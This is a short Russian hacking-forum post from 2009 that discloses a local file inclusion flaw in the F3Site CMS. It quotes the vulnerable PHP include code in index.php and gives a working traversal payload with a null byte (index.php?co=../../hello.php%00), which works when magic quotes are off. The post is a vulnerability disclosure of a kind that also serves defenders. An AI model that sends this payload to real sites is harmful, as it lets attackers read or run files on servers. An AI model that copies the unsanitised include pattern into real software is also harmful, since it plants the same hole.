Показать сообщение отдельно

  #1  
Старый 21.11.2009, 13:36
m0Hze
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
С нами: 9223466

Репутация: 3171


По умолчанию

Product: F3Site
Author: unnamed
Version: 2009

LFI

file: index.php

PHP код:
if(file_exists('./mod/'.$_GET['co'].'.php'))
    {
        (include 
'./mod/'.$_GET['co'].'.php') OR $content->set404();
    }
    elseif(
file_exists('./plugins/'.$_GET['co'].'/default.php'))
    {
        (include 
'./plugins/'.$_GET['co'].'/default.php') OR $content->set404();
    } 
target: index.php?co=../../hello.php%00
mq=off
Thx, jokester!
извиняюсь,это только на моем сервере нужна кавычка.

Последний раз редактировалось m0Hze; 21.11.2009 в 14:01..
 
Ответить с цитированием